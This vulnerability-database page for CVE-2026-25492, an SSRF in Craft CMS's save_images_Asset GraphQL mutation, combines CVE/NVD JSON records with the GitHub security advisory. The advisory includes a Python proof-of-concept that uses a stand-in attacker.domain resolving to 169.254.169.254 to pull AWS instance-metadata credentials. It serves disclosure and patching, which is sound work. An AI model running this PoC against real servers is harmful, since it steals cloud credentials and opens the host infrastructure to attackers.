Vulnerability-Lookup

CVE-2026-25492 (GCVE-0-2026-25492)

Vulnerability from cvelistv5 – Published: 2026-02-09 19:33 – Updated: 2026-02-10 16:00

Title

Craft has a save_images_Asset graphql mutation can be abused to exfiltrate AWS credentials of underlying host

Summary

Craft CMS is a content management system. In Craft versions 3.5.0 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the save_images_Asset GraphQL mutation can be abused to fetch internal URLs by providing a domain name that resolves to an internal IP address, bypassing hostname validation. When a non-image file extension such as .txt is allowed, downstream image validation is bypassed, which can allow an authenticated attacker with permission to use save_images_Asset to retrieve sensitive data such as AWS instance metadata credentials from the underlying host. This issue is patched in versions 4.16.18 and 5.8.22.

Severity ?

5.3 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/craftcms/cms/security/advisori…	x_refsource_CONFIRM
	https://github.com/craftcms/cms/commit/e838a221df…	x_refsource_MISC
	https://github.com/craftcms/cms/releases/tag/5.8.22	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	craftcms	cms	Affected: >= 5.0.0-RC1, < 5.8.22 Affected: >= 3.5.0, < 4.16.18

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25492",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-10T15:30:21.159141Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-10T16:00:41.366Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "cms",
          "vendor": "craftcms",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 5.0.0-RC1, \u003c 5.8.22"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.5.0, \u003c 4.16.18"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Craft CMS is a content management system. In Craft versions 3.5.0 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the save_images_Asset GraphQL mutation can be abused to fetch internal URLs by providing a domain name that resolves to an internal IP address, bypassing hostname validation. When a non-image file extension such as .txt is allowed, downstream image validation is bypassed, which can allow an authenticated attacker with permission to use save_images_Asset to retrieve sensitive data such as AWS instance metadata credentials from the underlying host. This issue is patched in versions 4.16.18 and 5.8.22."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-09T19:33:24.366Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/craftcms/cms/security/advisories/GHSA-96pq-hxpw-rgh8",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/craftcms/cms/security/advisories/GHSA-96pq-hxpw-rgh8"
        },
        {
          "name": "https://github.com/craftcms/cms/commit/e838a221df2ab15cd54248f22fc8355d47df29ff",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/craftcms/cms/commit/e838a221df2ab15cd54248f22fc8355d47df29ff"
        },
        {
          "name": "https://github.com/craftcms/cms/releases/tag/5.8.22",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/craftcms/cms/releases/tag/5.8.22"
        }
      ],
      "source": {
        "advisory": "GHSA-96pq-hxpw-rgh8",
        "discovery": "UNKNOWN"
      },
      "title": "Craft has a save_images_Asset graphql mutation can be abused to exfiltrate AWS credentials of underlying host"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25492",
    "datePublished": "2026-02-09T19:33:24.366Z",
    "dateReserved": "2026-02-02T16:31:35.823Z",
    "dateUpdated": "2026-02-10T16:00:41.366Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-25492\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-09T20:15:57.650\",\"lastModified\":\"2026-02-19T19:12:55.063\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Craft CMS is a content management system. In Craft versions 3.5.0 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the save_images_Asset GraphQL mutation can be abused to fetch internal URLs by providing a domain name that resolves to an internal IP address, bypassing hostname validation. When a non-image file extension such as .txt is allowed, downstream image validation is bypassed, which can allow an authenticated attacker with permission to use save_images_Asset to retrieve sensitive data such as AWS instance metadata credentials from the underlying host. This issue is patched in versions 4.16.18 and 5.8.22.\"},{\"lang\":\"es\",\"value\":\"Craft CMS es un sistema de gesti\u00f3n de contenido. En las versiones de Craft 3.5.0 a 4.16.17 y 5.0.0-RC1 a 5.8.21, la mutaci\u00f3n GraphQL save_images_Asset puede ser utilizada indebidamente para obtener URLs internas al proporcionar un nombre de dominio que se resuelve en una direcci\u00f3n IP interna, eludiendo la validaci\u00f3n del nombre de host. Cuando se permite una extensi\u00f3n de archivo que no es de imagen, como .txt, se elude la validaci\u00f3n de imagen posterior, lo que puede permitir a un atacante autenticado con permiso para usar save_images_Asset recuperar datos sensibles como credenciales de metadatos de instancia de AWS del host subyacente. Este problema est\u00e1 parcheado en las versiones 4.16.18 y 5.8.22.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"LOW\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.5.0\",\"versionEndExcluding\":\"4.16.18\",\"matchCriteriaId\":\"9E85FA80-6A50-430C-8E92-3D46BBE0682C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.0.0\",\"versionEndExcluding\":\"5.8.22\",\"matchCriteriaId\":\"CCCB684A-592F-495F-86A7-F16399C58701\"}]}]}],\"references\":[{\"url\":\"https://github.com/craftcms/cms/commit/e838a221df2ab15cd54248f22fc8355d47df29ff\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/craftcms/cms/releases/tag/5.8.22\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/craftcms/cms/security/advisories/GHSA-96pq-hxpw-rgh8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Patch\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-25492\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-10T15:30:21.159141Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-10T15:30:21.851Z\"}}], \"cna\": {\"title\": \"Craft has a save_images_Asset graphql mutation can be abused to exfiltrate AWS credentials of underlying host\", \"source\": {\"advisory\": \"GHSA-96pq-hxpw-rgh8\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"craftcms\", \"product\": \"cms\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 5.0.0-RC1, \u003c 5.8.22\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.5.0, \u003c 4.16.18\"}]}], \"references\": [{\"url\": \"https://github.com/craftcms/cms/security/advisories/GHSA-96pq-hxpw-rgh8\", \"name\": \"https://github.com/craftcms/cms/security/advisories/GHSA-96pq-hxpw-rgh8\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/craftcms/cms/commit/e838a221df2ab15cd54248f22fc8355d47df29ff\", \"name\": \"https://github.com/craftcms/cms/commit/e838a221df2ab15cd54248f22fc8355d47df29ff\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/craftcms/cms/releases/tag/5.8.22\", \"name\": \"https://github.com/craftcms/cms/releases/tag/5.8.22\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Craft CMS is a content management system. In Craft versions 3.5.0 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the save_images_Asset GraphQL mutation can be abused to fetch internal URLs by providing a domain name that resolves to an internal IP address, bypassing hostname validation. When a non-image file extension such as .txt is allowed, downstream image validation is bypassed, which can allow an authenticated attacker with permission to use save_images_Asset to retrieve sensitive data such as AWS instance metadata credentials from the underlying host. This issue is patched in versions 4.16.18 and 5.8.22.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-09T19:33:24.366Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-25492\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-10T16:00:41.366Z\", \"dateReserved\": \"2026-02-02T16:31:35.823Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-09T19:33:24.366Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-96PQ-HXPW-RGH8

Vulnerability from github – Published: 2026-02-09 20:35 – Updated: 2026-02-09 22:38

Summary

Craft CMS: save_images_Asset graphql mutation can be abused to exfiltrate AWS credentials of underlying host

Details

Summary

The save_images_Asset graphql mutation allows a user to give a url of an image to download. (Url must use a domain, not a raw IP.)
Attacker sets up domain attacker.domain with an A record of something like 169.254.169.254 (special AWS metadata IP)
Attacker invokes save_images_Asset with url: http://attacker.domain/latest/meta-data/iam/security-credentials and filename "foo.txt"
Craft fetches sensitive information on attacker's behalf, and makes it available for download at /assets/images/foo.txt
Normal checks to verify that image is valid are bypassed because of .txt extension
Normal checks to verify that url is not an IP address are bypassed because user provided a valid domain that resolves to a sensitive internal IP address

Details

handleUpload() in src/gql/resolvers/mutations/Assets.php contains the code that processes the save_images_Asset mutation.

It has some basic validation logic for the url parameter (source of the image) and filename parameter (what to save image as):

   } elseif (!empty($fileInformation['url'])) {
            $url = $fileInformation['url'];

            // make sure the hostname is alphanumeric and not an IP address
            $hostname = parse_url($url, PHP_URL_HOST);
            if (
                !filter_var($hostname, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) ||
                filter_var($hostname, FILTER_VALIDATE_IP)
            ) {
                throw new UserError("$url contains an invalid hostname.");
            }

            if (empty($fileInformation['filename'])) {
                $filename = AssetsHelper::prepareAssetName(pathinfo(UrlHelper::stripQueryString($url), PATHINFO_BASENAME));
            } else {
                $filename = AssetsHelper::prepareAssetName($fileInformation['filename']);
            }

            $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
            if (is_array($allowedExtensions) && !in_array($extension, $allowedExtensions, true)) {
                throw new AssetDisallowedExtensionException(Craft::t('app', "“{$extension}” is not an allowed file extension."));
            }

The upshot of this validation is that url must contain a hostname, not an IP, and filename must contain an allowed extension. If the allowed extension is a typical image extension, further validation will be done downstream to verify that the downloaded content is in fact an image.

An authenticated attacker can trick this mutation into fetching sensitive AWS metadata, or other sensitive information from the craft instance's internal network.

First, the attacker must register a domain -- e.g. attacker.domain.
Next, they must point their domain at the sensitive internal ip they'd like to access (e.g. 169.254.169.254)
Next, they make a request to save_images_Asset with url set to http://attacker.domain/sensitive/path with filename set to "something.txt"
Finally the attacker makes a http request to retrieve /assets/images/something.txt, which contains sensitive information

PoC

Preconditions

Graphql access must be enabled
Attacker must have access to a graphql token
Token must be configured to have access to save_images_Asset mutation
Attacker must have configured a domain, "attacker.domain" pointing to the sensitive internal IP address they'd like to access
.txt must be an allowed extension for uploads via save_images_Asset (as it is by default)

Code

import requests

# Replace GRAPHQL_ENDPOINT and BEARER_TOKEN per target.
GRAPHQL_ENDPOINT = 'http://localhost:8080/actions/graphql/api'
TOKEN = '<TOKEN HERE>'

mutation = '''
mutation SaveAsset($_file: FileInput!, $title: String, $focalPoint: String) { save_images_Asset(_file: $_file,
   title: $title, focalPoint: $focalPoint) { id title url filename focalPoint dateCreated } }
'''

variables = {
  '_file': {
    'url' : "http://attacker.domain/latest/meta-data/iam/security-credentials",
    'filename': 'foo.txt'

  },
  "title": "my photo",
  "focalPoint": "0.5;0.5"

}

resp = requests.post(GRAPHQL_ENDPOINT,
                     json={'query': mutation, 'variables': variables},
                     headers={'Authorization': f'Bearer {TOKEN}'})
print(resp.status_code, resp.text)

If attack is successful, response to running this script will be something like:

200 {"data":{"save_images_Asset":{"id":"211403","title":"my photo","url":"http://localhost:8080/assets/volumes/images/foo.txt","filename":"foo.txt","focalPoint":null,"dateCreated":"2025-12-18T09:45:24-08:00"}}}

Attacker can then download sensitive data by fetching http://localhost:8080/assets/volumes/images/foo.txt

Impact

Impacted users must:

Have graphql enabled
Have a graphql token created with permissions to use save_images_Asset
Have graphql token stolen by attacker or abused by malicious insider

Impact is heightened if:

craft is running on something like an AWS EC2 instance, which has a well-known, sensitive internal http address that can be accessed to fetch metadata.

Ultimate result is:

Attacker or malicious insider gets access to infrastructure craft is running on, not just craft itself.

Severity ?

5.3 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.8.21"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/craft"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-RC1"
            },
            {
              "fixed": "5.8.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.16.17"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/craft"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.5.0"
            },
            {
              "fixed": "4.16.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25492"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-09T20:35:23Z",
    "nvd_published_at": "2026-02-09T20:15:57Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\n- The save_images_Asset graphql mutation allows a user to give a url of an image to download.  (Url must use a domain, not a raw IP.)\n- Attacker sets up domain attacker.domain with an A record of something like 169.254.169.254 (special AWS metadata IP)\n- Attacker invokes save_images_Asset with url: http://attacker.domain/latest/meta-data/iam/security-credentials and filename \"foo.txt\"\n- Craft fetches sensitive information on attacker\u0027s behalf, and makes it available for download at /assets/images/foo.txt\n- Normal checks to verify that image is valid are bypassed because of .txt extension\n- Normal checks to verify that url is not an IP address are bypassed because user provided a valid domain that resolves to a sensitive internal IP address\n\n### Details\n\nhandleUpload() in src/gql/resolvers/mutations/Assets.php contains the code that processes the save_images_Asset mutation.\n\nIt has some basic validation logic for the url parameter (source of the image) and filename parameter (what to save image as):\n\n```\n   } elseif (!empty($fileInformation[\u0027url\u0027])) {\n            $url = $fileInformation[\u0027url\u0027];\n\n            // make sure the hostname is alphanumeric and not an IP address\n            $hostname = parse_url($url, PHP_URL_HOST);\n            if (\n                !filter_var($hostname, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) ||\n                filter_var($hostname, FILTER_VALIDATE_IP)\n            ) {\n                throw new UserError(\"$url contains an invalid hostname.\");\n            }\n\n            if (empty($fileInformation[\u0027filename\u0027])) {\n                $filename = AssetsHelper::prepareAssetName(pathinfo(UrlHelper::stripQueryString($url), PATHINFO_BASENAME));\n            } else {\n                $filename = AssetsHelper::prepareAssetName($fileInformation[\u0027filename\u0027]);\n            }\n\n            $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));\n            if (is_array($allowedExtensions) \u0026\u0026 !in_array($extension, $allowedExtensions, true)) {\n                throw new AssetDisallowedExtensionException(Craft::t(\u0027app\u0027, \"\u201c{$extension}\u201d is not an allowed file extension.\"));\n            }\n```\n\nThe upshot of this validation is that url must contain a hostname, not an IP, and filename must contain an allowed extension.  If the allowed extension is a typical image extension, further validation will be done downstream  to verify that the downloaded content is in fact an image.\n\nAn authenticated attacker can trick this mutation into fetching sensitive AWS metadata, or other sensitive information from the craft instance\u0027s internal network.\n\n- First, the attacker must register a domain -- e.g. attacker.domain.  \n- Next, they must point their domain at the sensitive internal ip they\u0027d like to access (e.g. 169.254.169.254)\n- Next, they make a request to save_images_Asset with url set to http://attacker.domain/sensitive/path with filename set to \"something.txt\"\n- Finally the attacker makes a http request to retrieve /assets/images/something.txt, which contains sensitive information\n\n\n### PoC\n\n#### Preconditions\n\n- Graphql access must be enabled\n- Attacker must have access to a graphql token\n- Token must be configured to have access to save_images_Asset mutation\n- Attacker must have configured a domain, \"attacker.domain\" pointing to the sensitive internal IP address they\u0027d like to access\n- .txt must be an allowed extension for uploads via save_images_Asset (as it is by default)\n\n#### Code\n\n```\nimport requests\n\n# Replace GRAPHQL_ENDPOINT and BEARER_TOKEN per target.\nGRAPHQL_ENDPOINT = \u0027http://localhost:8080/actions/graphql/api\u0027\nTOKEN = \u0027\u003cTOKEN HERE\u003e\u0027\n\nmutation = \u0027\u0027\u0027\nmutation SaveAsset($_file: FileInput!, $title: String, $focalPoint: String) { save_images_Asset(_file: $_file,\n   title: $title, focalPoint: $focalPoint) { id title url filename focalPoint dateCreated } }\n\u0027\u0027\u0027\n\nvariables = {\n  \u0027_file\u0027: {\n    \u0027url\u0027 : \"http://attacker.domain/latest/meta-data/iam/security-credentials\",\n    \u0027filename\u0027: \u0027foo.txt\u0027\n\n  },\n  \"title\": \"my photo\",\n  \"focalPoint\": \"0.5;0.5\"\n\n}\n\nresp = requests.post(GRAPHQL_ENDPOINT,\n                     json={\u0027query\u0027: mutation, \u0027variables\u0027: variables},\n                     headers={\u0027Authorization\u0027: f\u0027Bearer {TOKEN}\u0027})\nprint(resp.status_code, resp.text)\n```\n\nIf attack is successful, response to running this script will be something like:\n\n```\n200 {\"data\":{\"save_images_Asset\":{\"id\":\"211403\",\"title\":\"my photo\",\"url\":\"http://localhost:8080/assets/volumes/images/foo.txt\",\"filename\":\"foo.txt\",\"focalPoint\":null,\"dateCreated\":\"2025-12-18T09:45:24-08:00\"}}}\n```\n\nAttacker can then download sensitive data by fetching http://localhost:8080/assets/volumes/images/foo.txt\n\n\n### Impact\n\nImpacted users must:\n\n- Have graphql enabled\n- Have a graphql token created with permissions to use save_images_Asset\n- Have graphql token stolen by attacker or abused by malicious insider\n\nImpact is heightened if:\n\n- craft is running on something like an AWS EC2 instance, which has a well-known, sensitive internal http address that can be accessed to fetch metadata.  \n\nUltimate result is:\n\nAttacker or malicious insider gets access to infrastructure craft is running on, not just craft itself.",
  "id": "GHSA-96pq-hxpw-rgh8",
  "modified": "2026-02-09T22:38:27Z",
  "published": "2026-02-09T20:35:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-96pq-hxpw-rgh8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25492"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/e838a221df2ab15cd54248f22fc8355d47df29ff"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/releases/tag/4.16.18"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/releases/tag/5.8.22"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft CMS: save_images_Asset graphql mutation can be abused to exfiltrate AWS credentials of underlying host"
}

FKIE_CVE-2026-25492

Vulnerability from fkie_nvd - Published: 2026-02-09 20:15 - Updated: 2026-02-19 19:12

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/craftcms/cms/commit/e838a221df2ab15cd54248f22fc8355d47df29ff	Patch
security-advisories@github.com	https://github.com/craftcms/cms/releases/tag/5.8.22	Product, Release Notes
security-advisories@github.com	https://github.com/craftcms/cms/security/advisories/GHSA-96pq-hxpw-rgh8	Exploit, Patch, Vendor Advisory

Impacted products

	Vendor	Product	Version
	craftcms	craft_cms	*
	craftcms	craft_cms	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E85FA80-6A50-430C-8E92-3D46BBE0682C",
              "versionEndExcluding": "4.16.18",
              "versionStartIncluding": "3.5.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CCCB684A-592F-495F-86A7-F16399C58701",
              "versionEndExcluding": "5.8.22",
              "versionStartIncluding": "5.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Craft CMS is a content management system. In Craft versions 3.5.0 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the save_images_Asset GraphQL mutation can be abused to fetch internal URLs by providing a domain name that resolves to an internal IP address, bypassing hostname validation. When a non-image file extension such as .txt is allowed, downstream image validation is bypassed, which can allow an authenticated attacker with permission to use save_images_Asset to retrieve sensitive data such as AWS instance metadata credentials from the underlying host. This issue is patched in versions 4.16.18 and 5.8.22."
    },
    {
      "lang": "es",
      "value": "Craft CMS es un sistema de gesti\u00f3n de contenido. En las versiones de Craft 3.5.0 a 4.16.17 y 5.0.0-RC1 a 5.8.21, la mutaci\u00f3n GraphQL save_images_Asset puede ser utilizada indebidamente para obtener URLs internas al proporcionar un nombre de dominio que se resuelve en una direcci\u00f3n IP interna, eludiendo la validaci\u00f3n del nombre de host. Cuando se permite una extensi\u00f3n de archivo que no es de imagen, como .txt, se elude la validaci\u00f3n de imagen posterior, lo que puede permitir a un atacante autenticado con permiso para usar save_images_Asset recuperar datos sensibles como credenciales de metadatos de instancia de AWS del host subyacente. Este problema est\u00e1 parcheado en las versiones 4.16.18 y 5.8.22."
    }
  ],
  "id": "CVE-2026-25492",
  "lastModified": "2026-02-19T19:12:55.063",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
